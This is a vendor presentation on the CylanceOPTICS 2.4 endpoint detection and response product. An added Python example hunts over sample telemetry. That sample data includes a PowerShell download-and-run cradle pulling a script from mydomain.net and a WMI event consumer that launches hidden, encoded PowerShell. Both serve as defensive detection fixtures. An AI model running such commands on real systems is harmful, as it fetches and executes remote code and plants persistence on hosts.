Download - CylanceOPTICS AI Powered EDR - BlackBerry
CylanceOPTICS 2.4: Extended Visibility and Unparalleled Prevention
Matthiew Morin
Senior Product Manager
Agenda
▪ CylanceOPTICS Overview
▪ What are the key components of CylanceOPTICS?
▪ What is new in CylanceOPTICS v2.4?
▪ What are experts saying about CylanceOPTICS?
What is CylanceOPTICS?
CylanceOPTICS is the endpoint detection and response (EDR) component of the BlackBerry Cylance AI Platform™. It leverages and augments the prevention delivered by CylancePROTECT®, providing the consistent visibility required to discover and remediate hard-to-find threats.
BlackBerry Cylance product portfolio (built on data science, human expertise and threat research):
▪ CylancePROTECT: AI-native endpoint threat prevention
▪ Cylance Smart Antivirus™: AI-powered protection for home and small business
▪ CylanceThreatZERO™: solution implementation and human expertise
▪ Cylance Consulting: world-class IR, forensics, ICS and red team services
▪ CylanceOPTICS: ML-powered endpoint detection and response
▪ CylanceGUARD™: proactive managed detection and response
CylanceOPTICS: AI-Driven Endpoint Prevention
Source: https://www.gartner.com/reviews/market/endpoint-detection-and-response-solutions
▪ Prevent attacks
▪ Constantly monitor endpoints
▪ Automated, decisive action
▪ Smart threat hunting with InstaQuery
▪ Tap into contextual info with Focus View
How Do Analysts Define EDR?
CylanceOPTICS + Services
Detection
▪ Use various data analytics techniques to detect suspicious system behavior.
Investigation
▪ Provide contextual information.
▪ Record and store endpoint-system-level behaviors.
Containment
▪ Block malicious activity.
Remediation
▪ Provide remediation suggestions to restore affected systems.
Source: https://www.gartner.com/reviews/market/endpoint-detection-and-response-solutions
CylanceOPTICS Does What Others Can’t, Prevention-First EDR
▪ Focus is on preventing the
“unknown unknowns”
▪ Detection is an extension of our
prevention-based security
▪ Adding detection improves our
ability to prevent future attacks
▪ Preventing attacks creates more
time for proactive security
practices
Context Analysis Engine
▪ ML-powered detection on endpoints
▪ Constantly evolving detection logic
provided by Cylance’s Threat Research
team
▪ MITRE ATT&CK
▪ Novel attacks and actors seen in
the field
▪ Highly extensible custom logic exposed
to Users and Partners.
InstaQuery
▪ “Has this been seen in my
environment?”
▪ InstaQuery is a lightweight
analyst query with instant
access to the results
▪ Lets analysts quickly determine
if an endpoint is at risk
USE CASE:
Hunt for the prevalence of
ransomware IOCs throughout
a global environment
Focus View
▪ “How did this Threat get on a
Device?”
▪ Conduct root cause analysis
▪ Automatically gather contextual
evidence on:
▪ Threats
▪ Incidents
▪ Artifacts
USE CASES:
1. See command line arguments
used to decrypt initial
ransomware payloads
2. Observe support files being
introduced by malware
Packages & Playbooks
▪ Package Deploy allows complex
actions to be taken on endpoints at
scale on demand.
▪ Execute applications
▪ Collect artifacts
▪ Playbooks allow the same complex
actions to be taken automatically
when suspicious activity is detected.
▪ Collect additional critical forensic
information as soon as an
incident occurs.
▪ Scripting engine is exposed to Users
and Partners for near-infinite flexibility.
What’s New in CylanceOPTICS 2.4?
1. 2x Visibility into Endpoints
2. 5x Addressable Space with Context Analysis Engine
3. New InstaQuery Artifacts and Facets
4. New Focus View Data Points
Enhanced visibility across several key events and focus points:
▪ DNS: See which processes are resolving domains. Analyze the resolved addresses, record types, and more.
▪ PowerShell Introspection: See activity occurring within a PowerShell interpreter, or ‘novel’ methods of invoking PowerShell. Analyze the script payloads and content.
▪ WMI Introspection: See activity occurring within a WMI interpreter. Analyze WMI consumers, event filters, and referenced files.
▪ Portable Executable Parsing: Use CylanceOPTICS to conduct static analysis of critical executable file information. Analyze file version information, functions, import tables, and more.
▪ Private Address (RFC 1918 / RFC 4193) Space Visibility: Analyzes an event originating from a private (non-internet-routable) address on a TCP/IP network.
▪ Windows Logon Event Visibility: Records what instigated a Windows logon event, the user that logged on, the IP address and domain from which it was initiated, when it was initiated, and artifacts of the initiation.
InstaQuery – DNS Request
▪ Question Name
▪ “Has mydomain.net been seen?”
▪ Record Value
▪ “Has a domain ever resolved to
this?”
InstaQuery – PowerShell Trace
▪ Event ID
▪ “Show me all matches for Event
ID 4101.”
▪ Script Block Text
▪ “Has a script executed with this
text in it?”
▪ Payload
▪ “Has a payload or module
executed with this text in it?”
InstaQuery – WMI Trace
▪ Event ID
▪ “Show me all matches for Event
ID 5861.”
▪ Consumer Text
▪ “Has a WMI consumer been
created with this text in it?”
▪ Namespace
▪ “Has a WMI action been taken in
this Namespace?”
▪ Operation
▪ ”Has a WMI operation executed
with this text in it?”
InstaQuery – Windows Event
▪ Event ID
▪ “Show me all matches for Event
ID 4624.”
▪ Provider ID
▪ “Show me all events from the
SecurityAudit provider”
▪ Class
▪ “Show me all ‘Logon/Logoff’ events.”
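The InstaQuery facets listed above (DNS question name and record value, PowerShell event ID and script block text, WMI event ID 5861 with consumer text and namespace, Windows event ID 4624 with provider and class) and the private address space item from the 2.4 visibility list all come down to filtering endpoint telemetry records by artifact and facet. The Python below is an example added for this page, not CylanceOPTICS code or its API: it builds a handful of constructed records (the record layout, device names and the sample 5861 message text are assumptions modelled on the corresponding Windows event formats), parses a WMI-Activity 5861 message into Namespace and Consumer Text facets, and answers the same kinds of questions, including an RFC 1918 / RFC 4193 check on DNS answers.

```python
"""Hunt over constructed endpoint telemetry the way the InstaQuery facets above
are phrased.  Example code added for this page; it is not CylanceOPTICS code,
and the record layout and sample data are assumptions."""
import ipaddress
import re
from dataclasses import dataclass, field


@dataclass
class Record:
    device: str           # endpoint the record came from
    artifact: str         # "dns", "powershell", "wmi" or "winevent"
    facets: dict = field(default_factory=dict)


# RFC 1918 (IPv4) and RFC 4193 (IPv6 unique local) ranges, the definition used
# by the "Private Address Space Visibility" item above.
PRIVATE_SPACE = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7")]


def in_private_space(value):
    """True when value is an IP address inside RFC 1918 / RFC 4193 space."""
    try:
        ip = ipaddress.ip_address(value)
    except ValueError:
        return False        # hostnames and CNAME targets are not addresses
    return any(ip in net for net in PRIVATE_SPACE)


# Shape of a Microsoft-Windows-WMI-Activity/Operational event 5861 message
# (a permanent consumer bound to an event filter).  The regex follows the
# "Namespace = ...; Eventfilter = ...; Consumer = ...;" preamble of that
# message; the exact text is an assumption, so check it against a real event.
WMI_5861_RE = re.compile(
    r"Namespace = (?P<namespace>[^;]+); "
    r"Eventfilter = (?P<filter>.+?)(?: \(refer to its activate eventid:\d+\))?; "
    r"Consumer = (?P<consumer>[^;]+);")


def wmi_record_from_5861(device, message):
    """Parse a 5861 message into the Namespace / Consumer Text facets."""
    m = WMI_5861_RE.search(message)
    if m is None:
        raise ValueError("not a 5861-style filter-to-consumer binding message")
    # The consumer instance (CommandLineTemplate etc.) follows this marker.
    _, sep, tail = message.partition("Permanent EventConsumer:")
    consumer_text = tail.strip() if sep else m["consumer"].strip()
    return Record(device, "wmi", {
        "event_id": 5861,
        "namespace": m["namespace"].strip(),
        "filter": m["filter"].strip(),
        "consumer_text": consumer_text,
    })


def instaquery(records, artifact, facet, value):
    """Devices holding a record of `artifact` whose `facet` matches `value`.

    Integer values (event IDs) match exactly; strings match as a
    case-insensitive substring, as the "with this text in it" questions imply.
    """
    hits = set()
    for r in records:
        if r.artifact != artifact or facet not in r.facets:
            continue
        have = r.facets[facet]
        if isinstance(value, int):
            matched = have == value
        else:
            matched = value.casefold() in str(have).casefold()
        if matched:
            hits.add(r.device)
    return sorted(hits)


def private_space_devices(records):
    """Devices where a DNS answer (record value) fell inside private space."""
    return sorted({r.device for r in records if r.artifact == "dns"
                   and in_private_space(r.facets.get("record_value", ""))})


# --- constructed sample telemetry (not real data) ---------------------------
WMI_5861_SAMPLE = (
    'Namespace = //./root/subscription; Eventfilter = UpdaterFilter '
    '(refer to its activate eventid:5859); '
    'Consumer = CommandLineEventConsumer="UpdaterConsumer"; '
    'PossibleCause = Binding EventFilter:\n'
    'instance of __EventFilter\n{\n\tName = "UpdaterFilter";\n'
    '\tQuery = "SELECT * FROM __InstanceModificationEvent WITHIN 60 '
    "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\";\n};\n"
    'Permanent EventConsumer:\ninstance of CommandLineEventConsumer\n{\n'
    '\tCommandLineTemplate = "powershell.exe -nop -w hidden -enc SQBFAFgA";\n'
    '\tName = "UpdaterConsumer";\n};\n')

RECORDS = [
    Record("WS-01", "dns", {"process": "powershell.exe", "question_name": "mydomain.net",
                            "record_type": "A", "record_value": "10.20.30.40"}),
    Record("WS-02", "dns", {"process": "chrome.exe", "question_name": "updates.example.org",
                            "record_type": "A", "record_value": "93.184.216.34"}),
    Record("WS-01", "powershell", {"event_id": 4104, "script_block_text":
           "IEX (New-Object Net.WebClient).DownloadString('http://mydomain.net/a.ps1')"}),
    wmi_record_from_5861("SRV-01", WMI_5861_SAMPLE),
    Record("SRV-01", "winevent", {"event_id": 4624, "provider": "Microsoft-Windows-Security-Auditing",
                                  "class": "Logon/Logoff", "target_user": "svc_backup",
                                  "logon_type": 3, "ip_address": "10.20.30.40"}),
]

if __name__ == "__main__":
    print(instaquery(RECORDS, "dns", "question_name", "mydomain.net"))
    print(instaquery(RECORDS, "wmi", "namespace", "root/subscription"))
    print(instaquery(RECORDS, "winevent", "event_id", 4624))
    print(private_space_devices(RECORDS))
```

Event IDs are matched exactly and text facets by substring on purpose: a question like “Has a script executed with this text in it?” should hit on a fragment of a script block, while “Show me all matches for Event ID 5861” should not also return 5858 or 5859 operations. The 5861 parser only trusts the preamble of the message; the WQL filter query and the consumer’s command line are kept as text so they can be searched like any other facet.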
What Are Experts Saying About CylanceOPTICS?
Gartner Peer Insights
and Forrester: Total Economic
Impact™ Study
“Cylance is the best of breed in
threat detection and prevention.
Since installing CylancePROTECT
and OPTICS, we can sleep at night.”
— Gartner Peer Insights, April 2019.
In a study by Forrester, CylanceOPTICS:
▪ Improved the security team’s productivity by 10%
▪ Reduced lost time by 95%
▪ Reduced the expected cost of a major security breach by 25%
— Forrester: The Total Economic Impact™ study of CylancePROTECT® and CylanceOPTICS™, May 2019